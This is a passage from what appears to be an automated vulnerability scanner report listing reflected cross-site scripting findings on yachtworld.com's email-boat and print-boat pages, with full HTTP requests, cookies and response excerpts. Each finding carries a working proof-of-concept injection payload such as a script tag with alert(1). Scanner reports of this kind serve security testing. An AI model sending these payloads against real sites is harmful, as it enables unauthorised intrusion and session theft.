savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:35:17 GMT
Server: Apache
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...

...[SNIP]...

3.493. http://www.yachtworld.com/core/rendering/email-boat.htm [units parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/rendering/email-boat.htm

Issue detail

The value of the units request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83fde"%3balert(1)//e812cc441a was submitted in the units parameter. This input was echoed as 83fde";alert(1)//e812cc441a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/rendering/email-boat.htm?url=legendary&boatId=2266476&units=Feet83fde"%3balert(1)//e812cc441a&officeId=75325&boatUrl=%2Fboats%2F2006%2F32-Regulator-With-Trailer-**reduced**-2266476%2FDestin%2FFL%2FUnited-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:35:16 GMT
Server: Apache
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...

...[SNIP]...

3.494. http://www.yachtworld.com/core/rendering/email-boat.htm [units parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/rendering/email-boat.htm

Issue detail

The value of the units request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b8eb"><script>alert(1)</script>864653982b7 was submitted in the units parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/rendering/email-boat.htm?url=legendary&boatId=2266476&units=Feet5b8eb"><script>alert(1)</script>864653982b7&officeId=75325&boatUrl=%2Fboats%2F2006%2F32-Regulator-With-Trailer-**reduced**-2266476%2FDestin%2FFL%2FUnited-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:35:15 GMT
Server: Apache
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<input type="hidden" name="units" value="Feet5b8eb"><script>alert(1)</script>864653982b7"/>
...[SNIP]...

3.495. http://www.yachtworld.com/core/rendering/email-boat.htm [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/rendering/email-boat.htm

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92ca8"%3balert(1)//ee9bc0c1db5 was submitted in the url parameter. This input was echoed as 92ca8";alert(1)//ee9bc0c1db5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/rendering/email-boat.htm?url=legendary92ca8"%3balert(1)//ee9bc0c1db5&boatId=2266476&units=Feet&officeId=75325&boatUrl=%2Fboats%2F2006%2F32-Regulator-With-Trailer-**reduced**-2266476%2FDestin%2FFL%2FUnited-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:35:12 GMT
Server: Apache
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...

...[SNIP]...

3.496. http://www.yachtworld.com/core/rendering/print-boat.htm [boatId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/rendering/print-boat.htm

Issue detail

The value of the boatId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 342f7'%3balert(1)//66732b4e7c was submitted in the boatId parameter. This input was echoed as 342f7';alert(1)//66732b4e7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/rendering/print-boat.htm?url=legendary&boatId=2266476342f7'%3balert(1)//66732b4e7c&officeId=75325&isPLS=0 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 500 Internal Server Error
Date: Thu, 27 Jan 2011 20:35:15 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "2266476342f7';alert(1)//66732b4e7c"<br>
...[SNIP]...

3.497. http://www.yachtworld.com/core/rendering/print-boat.htm [officeId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/rendering/print-boat.htm

Issue detail

The value of the officeId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3b9e'%3balert(1)//977a17ea687 was submitted in the officeId parameter. This input was echoed as f3b9e';alert(1)//977a17ea687 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/rendering/print-boat.htm?url=legendary&boatId=2266476&officeId=75325f3b9e'%3balert(1)//977a17ea687&isPLS=0 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; 